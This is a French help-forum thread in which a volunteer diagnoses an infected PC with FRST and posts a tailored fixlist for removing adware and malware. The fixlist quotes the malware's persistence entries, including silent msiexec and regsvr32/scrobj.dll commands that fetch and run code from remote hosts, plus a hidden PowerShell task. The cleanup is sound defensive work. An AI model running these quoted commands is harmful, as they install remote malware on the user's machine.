Votre question
Résolu

virus probable sur mon pc

Tags :
  • hijacker
  • PC
  • Virus
  • Adware
  • Antivirus gratuit
  • Sécurité
Dernière réponse : dans Sécurité et virus
27 Avril 2017 07:08:11

Bonjour
J'ai récupéré un pc et ai voulu installé un anti virus gratuit, or ce ne sais s'il en est la cause le pc fait n importe quoi, me ferme les pages, ajoute des extensions...bref j ai perdu le contrôle et aurais besoin d'aide
merci

Autres pages sur : virus probable

27 Avril 2017 11:42:11

Bonjour , Mirabelle55

==========================================================================
Je suis longaripa.
Je suis en formation sécurité , et je vais prendre votre sujet en charge .
Toutes mes interventions seront validées par un expert en sécurité de ce forum .
==========================================================================


Nous allons commencer par établir un diagnostic du PC . Pour cela ,

Télécharger Farbar Recovery Scan Tool (de Farbar) sur le Bureau.(IMPORTANT)

Attention: Il faut lancer la version compatible avec le système : 32 ou 64bits.

Cliquer ici pour la version 32 bits
Cliquer ici pour la version 64 bits


Info : comment savoir quelle version de Windows j'utilise ?

Sous IE9 ou IE10, le filtre SmartScreen déclenche une alerte. Cliquer sur Actions puis sur Exécuter quand même

  • Faire un click droit sur l'outil, puis executer en tant qu'administrateur pour le lancer. Quand l'outil se lance, cliquer sur Oui pour accepter le disclaimer.
  • Cliquer sur le bouton Analyser.
  • L'outil va créer un rapport nommé FRST.txt, enregistré dans le même dossier que l'outil.
  • A son premier lancement, l'outil va aussi créer un fichier nommé Addition.txt.


  • Poster les deux rapports générés.

  • Pour les rapports, merci d'utiliser ce service de rapport en ligne : déposer le fichier via "parcourir" et poster simplement les liens obtenus dans votre réponse.
    Une aide à l'utilisation ici



    J'attends les rapports :

    frst.txt
    addition.txt
    m
    0
    l
    27 Avril 2017 11:49:10

    bonjour !
    Et le message précédent de AccroPC2 me demandant de formater mon pc ?
    m
    0
    l
    Contenus similaires
    27 Avril 2017 11:58:52

    Re

    Citation :
    Et le message précédent de AccroPC2 me demandant de formater mon pc ?


    Surtout , n'en tenez pas compte.
    D'ailleurs , il a du etre supprimé par la modération , je ne le vois pas .

    Suivez la procédure que je vous ai indiquée
    m
    0
    l
    27 Avril 2017 16:33:00

    J'étudie vos rapports et je reviens .....

    m
    0
    l
    28 Avril 2017 11:11:12

    longaripa a dit :
    J'étudie vos rapports et je reviens .....



    m
    0
    l
    28 Avril 2017 11:11:31

    ok ! j'espère que ce n'est pas trop grave
    m
    0
    l
    28 Avril 2017 11:17:53

    Re
    Je fais valider mes réponses par un expert.

    C'est un peu long , parce que ce pc est pas mal chargé en malwares .
    Il y en a beaucoup.
    Ce n'est pas étonnant qu'il ait un comportement bizarre ...
    m
    0
    l
    28 Avril 2017 11:21:10

    ok merci

    je m'en doutais un peu .... :/ 
    m
    0
    l
    28 Avril 2017 11:43:13

    Je vais vous demander un rapport supplémentaire , avec FRST :


    • Faire un click droit sur l'outil, puis executer en tant qu'administrateur pour le lancer. Quand l'outil se lance, cliquer sur Oui pour accepter le disclaimer.
    • cochez la case : shortcut.txt
    • Cliquer sur le bouton Analyser.
    • L'outil va créer un rapport nommé FRST.txt,et un rapport shortcut.txt enregistrés dans le même dossier que l'outil.

      Postez le rapport shortcut.txt , de la meme maniere que les précédents .

      merci , a plus tard
    m
    0
    l
    29 Avril 2017 17:34:23

    Bonjour

    Désolé pour le délai , mais il y a beaucoup a corriger .
    ca va venir ..

    En attendant , une question :

    est-ce que vous utilisez chrome , comme navigateur ?
    Est-ce vous qui l'avez installé ?
    Si oui , comment : sur le site officiel , ou via une promo pendant l'installation d'un autre logiciel ?

    m
    0
    l
    29 Avril 2017 17:37:41

    Hello,
    Pas de soucis :-)
    Oui c'est moi qui l'ai installé mais pas en même temps qu'autre chose non
    m
    0
    l
    29 Avril 2017 17:43:49

    Ok

    Vous l'avez telechargé ou ?
    Sur le site officiel , ou ailleurs ?

    Parce que les dossiers d'installation de Chrome ne sont pas standard , et correspondent à une installation par un adware/malware ...

    m
    0
    l
    29 Avril 2017 17:45:01

    désolée, je n en ai pas vraiment le souvenir...

    m
    0
    l
    29 Avril 2017 17:52:30

    Ce n'est pas grave .

    Si vous l'utilisez , on sera surement amenés à le désinstaller , et le ré-installer a partir d'une source sure.

    je vous dirai le moment venu , avec les détails nécessaires .
    m
    0
    l
    29 Avril 2017 17:54:02

    oui je l'utilise principalement, pas de problème

    m
    0
    l
    30 Avril 2017 16:59:02

    Bonjour

    Je reviens vers vous , avec une autre question :
    en fait , les memes que pour Chrome , mais pour Firefox
    Son installation n'est pas "normale" , et est concomitante avec celle de Chrome , ce qui est bizarre

    Est-ce que vous utilisez Firefox , comme navigateur ?
    Est-ce vous qui l'avez installé ?
    Si oui , comment : sur le site officiel , ou via une promo pendant l'installation d'un autre logiciel ?

    m
    0
    l
    30 Avril 2017 17:01:42


    non ce n'est pas moi qui l'ai installé et je ne pense pas l'avoir utilisé

    m
    0
    l
    30 Avril 2017 18:48:16

    Re

    Je reviens pour la désinfection , désolé pour le délai , mais il y a vraiment beaucoup de choses à corriger .

    Il faut etre vigilant , car beaucoup s'installent avec votre accord , si vous ne décochez pas les cases correspondantes lors d'installations de programmes .
    Pour résumer , je vais vous demander de désinstaller 2 programmes , YAC et Chrome ,
    Je vais supprimer Firefox , ainsi que de nombreux malwares .

    Auparavant , vous allez télécharger le setup de Chrome , pour pouvoir le réinstaller facilement apres.
    Vous le trouverez ici :
    https://www.google.fr/chrome/browser/desktop/index.html
    Cliquez sur le bouton bleu : télécharger Chrome.
    Vous aurez un fichier : ChromeSetup.exe , dans le dossier téléchargements .
    Uns fois que la désinfection sera terminée , vous n'aurez qu'à le lancer pour installer chrome .

    1) Désinstallation de programmes :

    Click droit sur le logo Windows (démarrer) > programmes et fonctionalités
    Désinstallez, si présents.:
    YAC(Yet Another Cleaner!)
    Google Chrome

    Note : Si il y a une erreur à la désinstallation , passez a la suite .

    2) Correctif FRST

    Correction a apporter :

    Désactiver l'antivirus avant la procédure.

    Rappel : Il est important que les deux ,l'outil FRST et le fichier fixlist.txt se trouvent dans le même emplacement, sur le bureau sinon la correction ne fonctionnera pas.
    Même si le logiciel FRST semble bloqué au passage du correctif,le laisser travailler. Le PC va redémarrerer.

    /!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnement et endommager Windows /!\

    /!\ Attention, les outils ne doivent être lancés qu'une seule fois afin de ne pas fausser les rapports demandés. /!\.

    • Ouvrir le Bloc-notes (Démarrer => Tous les programmes => Accessoires => Bloc-notes).
    • Copier/coller la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes



  • start
    CreateRestorePoint:
    CloseProcesses:
    HKU\S-1-5-21-965514391-245539569-54678387-1002\...\Run: [Chromium] => c:\users\isa\appdata\local\chromium\application\chrome.exe [1043456 2016-01-26] (The Chromium Authors)
    HKU\S-1-5-21-965514391-245539569-54678387-1002\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XMTQQMdZWMdE1OTLXFkJXRUY1MWF2NWI3Mdw3MYZQMc== /q
    GroupPolicy: Restriction <======= ATTENTION
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101331&z=dca826a3fc54245a9b5cdffg3z5t7ccgcefg1c9efg&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9ED548217&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493101331&z=dca826a3fc54245a9b5cdffg3z5t7ccgcefg1c9efg&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9ED548217&q={searchTerms}
    Edge HomeButtonPage: HKU\S-1-5-21-965514391-245539569-54678387-1002 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493101331&z=dca826a3fc54245a9b5cdffg3z5t7ccgcefg1c9efg&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9ED548217
    CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1492661631&from=36600419&uid=st1000lm024xhn-m101mbb_s2smj9ed548217&z=dfa164c1358e656a6fdd226g0z0t4o5qcq3gdqceaz
    CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1492661631&from=36600419&uid=st1000lm024xhn-m101mbb_s2smj9ed548217&z=dfa164c1358e656a6fdd226g0z0t4o5qcq3gdqceaz"
    CHR DefaultSearchURL: Default -> hxxp://www.luckysearch123.com/search.php?type=ds&ts=1492661631&from=36600419&uid=st1000lm024xhn-m101mbb_s2smj9ed548217&z=dfa164c1358e656a6fdd226g0z0t4o5qcq3gdqceaz&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> luck
    HKU\S-1-5-21-965514391-245539569-54678387-1002\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATTENTION
    R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
    R2 Kitty; C:\Users\Isa\AppData\Local\Kitty\Kitty.dll [553472 2017-04-25] (kitty) [Fichier non signé] <==== ATTENTION
    R2 SNARE; C:\Users\Isa\AppData\Local\SNARE\Snare.dll [833536 2017-04-27] (InterSect Alliance Pty Ltd) [Fichier non signé]
    R2 WinSAPSvc; C:\Users\Isa\AppData\Roaming\WinSAPSvc\WinSAP.dll [550400 2017-04-27] (win) [Fichier non signé] <==== ATTENTION
    R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
    S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
    S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
    R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
    R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
    R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== ATTENTION
    S3 mferkdet; C:\WINDOWS\System32\drivers\mferkdet.sys [106112 2012-06-22] (McAfee, Inc.)
    2017-04-17 15:06 - 2017-04-17 15:06 - 00000000 ____D C:\Users\Isa\AppData\Roaming\Elex-tech
    2017-04-17 15:06 - 2017-04-17 15:06 - 00000000 ____D C:\Program Files (x86)\Elex-tech
    2017-04-17 15:06 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
    2017-04-17 15:06 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
    2017-04-17 15:03 - 2017-04-17 15:03 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-17 15:02 - 2017-04-27 08:47 - 00003656 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-04-17 15:02 - 2017-04-27 08:47 - 00000000 ____D C:\Users\Isa\AppData\Local\Kitty
    2017-04-17 15:02 - 2017-04-27 08:46 - 00000000 ____D C:\Users\Isa\AppData\Roaming\WinSAPSvc
    2017-04-17 15:02 - 2017-04-27 08:46 - 00000000 ____D C:\Users\Isa\AppData\Local\SNARE
    2017-04-17 15:04 - 2017-04-17 15:04 - 00000000 ____D C:\Users\Isa\AppData\Local\Eastness
    2017-04-17 15:02 - 2017-04-17 15:02 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-17 14:57 - 2017-04-17 15:02 - 00000000 ____D C:\Program Files (x86)\BiaoJi
    2017-04-13 15:21 - 2017-04-13 15:21 - 00003672 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-10 11:02 - 2017-04-13 15:21 - 00003650 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
    2017-04-24 09:15 - 2017-04-27 10:30 - 00003530 _____ C:\WINDOWS\System32\Tasks\T0528
    2017-04-17 15:06 - 2016-05-23 04:37 - 00065696 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
    2017-04-17 15:06 - 2016-05-23 04:37 - 00179200 _____ () C:\Program Files (x86)\Elex-tech\YAC\libpng.dll
    2017-04-27 08:47 - 2017-04-27 08:47 - 00000000 ____D C:\WINDOWS\psgo
    2017-04-17 15:03 - 2017-04-17 05:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll
    2017-04-27 08:47 - 2017-04-27 08:47 - 00003576 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-04-24 09:15 - 2017-04-27 10:30 - 00003530 _____ C:\WINDOWS\System32\Tasks\T0528
    2017-04-17 15:03 - 2017-04-17 15:03 - 00000000 ____D C:\ProgramData\Software
    2017-04-13 15:20 - 2017-04-13 15:20 - 00000000 ____D C:\Users\Isa\AppData\Roaming\SSMgre
    2017-04-17 15:03 - 2017-03-09 07:31 - 02187096 _____ () C:\Program Files (x86)\Eastness\Application\libglesv2.dll
    2017-04-17 15:03 - 2017-03-09 07:31 - 00086360 _____ () C:\Program Files (x86)\Eastness\Application\libegl.dll
    Task: {1B0B0060-DBD8-4DDA-830A-B6860FB7F908} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1XMTQQMdZWMdE1OTLXFkJXRUY1MWF2NWI3Mdw3MYZQMc== scrobj.dll
    Task: {1B81B762-6DC0-4187-AB5B-80746BAD67CE} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATTENTION
    Task: {498FC126-51F1-4DA4-969B-BE077D95CD49} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1XMTQQMdZWMdE1OTLXFkJXRUY1MWF2NWI3Mdw3MYZQMc== scrobj.dll
    Task: {E23685B4-B5F9-40AB-803C-75F22321F6E4} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
    Task: {E3EBC070-C898-4FD4-AF3C-ACE3A2C240DB} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    FirewallRules: [{D8211320-3D61-4C62-8B40-7C21C954F308}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm024xhn-m101mbb_s2smj9ed548217.dat
    FirewallRules: [{D31E9994-879E-45B7-B039-6C7750344417}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm024xhn-m101mbb_s2smj9ed548217.dat
    FirewallRules: [{C5C4643D-6008-44C0-B176-EBED6808E603}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
    HKU\S-1-5-21-965514391-245539569-54678387-1002\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATTENTION
    C:\Program Files (x86)\McAfee
    C:\Program Files\McAfee
    C:\Users\Isa\AppData\Roaming\WinSAPSvc
    C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys
    C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys
    c:\users\isa\appdata\local\chromium
    C:\WINDOWS\System32\drivers\mferkdet.sys
    Shortcut: C:\Users\Isa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Isa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    ShortcutWithArgument: C:\Users\Isa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493101331&z=dca826a3fc54245a9b5cdffg3z5t7ccgcefg1c9efg&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9ED548217
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_togoo_17_12¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dfr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1Qzu0B0AyByCtA0F0AtAyE0A0CyD0E0CtCzztN0D0Tzu0StCzytDyDtN1L2XzutAtFtByCtFtBtFyDtDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2SyDzy0E0CtCyCtDtDtGyB0F0AyEtGyEyBtAtDtGtD0F0E0FtGtDtDtCyEtAyEyD0D0DyEyCzy2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAzzzzzytAzyyCyDtG0FyE0EyDtGyEtDtC0DtG0AtBtCzztGyDzytDtAyDtByBtDzytCyBtB2QtN0A0LzuyE%26cr%3D598280320%26a%3Dwbf_togoo_17_12%26os_ver%3D6.2%26os%3DWindows%2B8
    SearchScopes: HKLM -> DefaultScope {CE686CF3-ADC4-4C3D-A759-56527326CC56} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_togoo_17_12¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1Qzu0B0AyByCtA0F0AtAyE0A0CyD0E0CtCzztN0D0Tzu0StCzytDyDtN1L2XzutAtFtByCtFtBtFyDtDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2SyDzy0E0CtCyCtDtDtGyB0F0AyEtGyEyBtAtDtGtD0F0E0FtGtDtDtCyEtAyEyD0D0DyEyCzy2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAzzzzzytAzyyCyDtG0FyE0EyDtGyEtDtC0DtG0AtBtCzztGyDzytDtAyDtByBtDzytCyBtB2QtN0A0LzuyE%26cr%3D598280320%26a%3Dwbf_togoo_17_12%26os_ver%3D6.2%26os%3DWindows%2B8&p={searchTerms}
    SearchScopes: HKLM -> {CE686CF3-ADC4-4C3D-A759-56527326CC56} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_togoo_17_12¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1Qzu0B0AyByCtA0F0AtAyE0A0CyD0E0CtCzztN0D0Tzu0StCzytDyDtN1L2XzutAtFtByCtFtBtFyDtDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2SyDzy0E0CtCyCtDtDtGyB0F0AyEtGyEyBtAtDtGtD0F0E0FtGtDtDtCyEtAyEyD0D0DyEyCzy2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAzzzzzytAzyyCyDtG0FyE0EyDtGyEtDtC0DtG0AtBtCzztGyDzytDtAyDtByBtDzytCyBtB2QtN0A0LzuyE%26cr%3D598280320%26a%3Dwbf_togoo_17_12%26os_ver%3D6.2%26os%3DWindows%2B8&p={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {CE686CF3-ADC4-4C3D-A759-56527326CC56} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_togoo_17_12¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1Qzu0B0AyByCtA0F0AtAyE0A0CyD0E0CtCzztN0D0Tzu0StCzytDyDtN1L2XzutAtFtByCtFtBtFyDtDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2SyDzy0E0CtCyCtDtDtGyB0F0AyEtGyEyBtAtDtGtD0F0E0FtGtDtDtCyEtAyEyD0D0DyEyCzy2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAzzzzzytAzyyCyDtG0FyE0EyDtGyEtDtC0DtG0AtBtCzztGyDzytDtAyDtByBtDzytCyBtB2QtN0A0LzuyE%26cr%3D598280320%26a%3Dwbf_togoo_17_12%26os_ver%3D6.2%26os%3DWindows%2B8&p={searchTerms}
    SearchScopes: HKLM-x32 -> {CE686CF3-ADC4-4C3D-A759-56527326CC56} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_togoo_17_12¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1Qzu0B0AyByCtA0F0AtAyE0A0CyD0E0CtCzztN0D0Tzu0StCzytDyDtN1L2XzutAtFtByCtFtBtFyDtDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2SyDzy0E0CtCyCtDtDtGyB0F0AyEtGyEyBtAtDtGtD0F0E0FtGtDtDtCyEtAyEyD0D0DyEyCzy2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAzzzzzytAzyyCyDtG0FyE0EyDtGyEtDtC0DtG0AtBtCzztGyDzytDtAyDtByBtDzytCyBtB2QtN0A0LzuyE%26cr%3D598280320%26a%3Dwbf_togoo_17_12%26os_ver%3D6.2%26os%3DWindows%2B8&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-965514391-245539569-54678387-1002 -> DefaultScope {CE686CF3-ADC4-4C3D-A759-56527326CC56} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_togoo_17_12¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1Qzu0B0AyByCtA0F0AtAyE0A0CyD0E0CtCzztN0D0Tzu0StCzytDyDtN1L2XzutAtFtByCtFtBtFyDtDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2SyDzy0E0CtCyCtDtDtGyB0F0AyEtGyEyBtAtDtGtD0F0E0FtGtDtDtCyEtAyEyD0D0DyEyCzy2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAzzzzzytAzyyCyDtG0FyE0EyDtGyEtDtC0DtG0AtBtCzztGyDzytDtAyDtByBtDzytCyBtB2QtN0A0LzuyE%26cr%3D598280320%26a%3Dwbf_togoo_17_12%26os_ver%3D6.2%26os%3DWindows%2B8&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-965514391-245539569-54678387-1002 -> {CE686CF3-ADC4-4C3D-A759-56527326CC56} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_togoo_17_12¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwinyahoo%26cd%3D2XzuyEtN2Y1L1Qzu0B0AyByCtA0F0AtAyE0A0CyD0E0CtCzztN0D0Tzu0StCzytDyDtN1L2XzutAtFtByCtFtBtFyDtDtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2SyDzy0E0CtCyCtDtDtGyB0F0AyEtGyEyBtAtDtGtD0F0E0FtGtDtDtCyEtAyEyD0D0DyEyCzy2QtN1M1F1B2Z1V1N2Y1L1Qzu2StAzzzzzytAzyyCyDtG0FyE0EyDtGyEtDtC0DtG0AtBtCzztGyDzytDtAyDtByBtDzytCyBtB2QtN0A0LzuyE%26cr%3D598280320%26a%3Dwbf_togoo_17_12%26os_ver%3D6.2%26os%3DWindows%2B8&p={searchTerms}
    R2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [106496 2017-04-17] () [Fichier non signé]
    FF DefaultProfile: tbhmk488.default
    FF ProfilePath: C:\Users\Isa\AppData\Roaming\Firefox\Firefox\Profiles\tbhmk488.default [2017-04-26]
    FF Extension: (SimilarWeb) - C:\Users\Isa\AppData\Roaming\Firefox\Firefox\Profiles\tbhmk488.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-22] [non signé]
    FF Extension: (HSearch) - C:\Users\Isa\AppData\Roaming\Firefox\Firefox\Profiles\tbhmk488.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-22] [non signé]
    FF Extension: (FF Adr) - C:\Users\Isa\AppData\Roaming\Firefox\Firefox\Profiles\tbhmk488.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [non signé]
    FF Extension: (Français Language Pack) - C:\Users\Isa\AppData\Roaming\Firefox\Firefox\Profiles\tbhmk488.default\Extensions\langpack-fr@firefox.mozilla.org.xpi [2017-04-19] [non signé]
    FF SearchPlugin: C:\Users\Isa\AppData\Roaming\Firefox\Firefox\Profiles\tbhmk488.default\searchplugins\startsearch.xml [2017-04-19]
    FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => non trouvé(e)
    FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\mcafee\msc\npMcSnFFPl64.dll [Pas de fichier]
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-07] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-07] (Intel Corporation)
    FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll [Pas de fichier]
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2011-04-05] (Microsoft Corporation)
    FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Pro 8\npnitromozilla.dll [2012-12-13] (Nitro PDF)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)
    2017-04-19 18:19 - 2017-04-19 18:19 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-04-17 15:04 - 2017-04-19 18:19 - 00002076 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2017-04-17 15:04 - 2017-04-19 18:19 - 00002006 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2017-04-17 15:04 - 2017-04-17 15:04 - 00000000 ____D C:\Users\Isa\AppData\Roaming\Firefox
    2017-04-17 15:04 - 2017-04-17 15:04 - 00000000 ____D C:\Users\Isa\AppData\Local\Firefox
    FirewallRules: [{E3608133-7782-4613-AB98-5D48BD50D148}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
    FirewallRules: [{9D6F70E6-F69D-4A82-901F-7DF6BFDDFBCB}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation)
    Shortcut: C:\Users\Isa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation)
    Shortcut: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation)
    2017-04-27 05:35 - 2017-03-20 16:51 - 00002281 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2017-04-27 05:35 - 2017-03-20 16:51 - 00002269 _____ C:\Users\Public\Desktop\Google Chrome.lnk
    2017-04-21 12:30 - 2017-04-25 12:41 - 00000000 ____D C:\Program Files (x86)\AlphaGo
    2017-04-20 17:15 - 2017-04-25 12:41 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-20 13:59 - 2017-04-25 12:41 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-20 13:59 - 2017-04-20 13:59 - 00000000 _____ C:\WINDOWS\SysWOW64\33
    EmptyTemp:
    end


    • Enregistrer le fichier sur le bureau sous le nom fixlist.txt


    • Fermer toutes les applications, y compris le navigateur
    • Lancer FRST par clic-droit -> Exécuter en tant qu'administrateur
    • Sur le menu principal, cliquer une seule fois sur corriger et patienter le temps de la correction
    • Le pc va demander à redémarrer, accepter cette condition.
      L'outil a créé un rapport de correction Fixlog.txt sur le bureau.
      Hébergez ce rapport et postez le lien .
    • Pour les rapports, merci d'utiliser ce service de rapport en ligne : déposer le fichier via "parcourir" et poster simplement les liens obtenus dans votre réponse.
      Une aide à l'utilisation ici



      Sous IE9 ou IE10, le filtre SmartScreen déclenche une alerte. Cliquer sur Actions puis sur Exécuter quand même



  • Vous avez 1 rapport à poster :

    fixlog.txt

    Précision :
    Chrome ne sera plus accessible
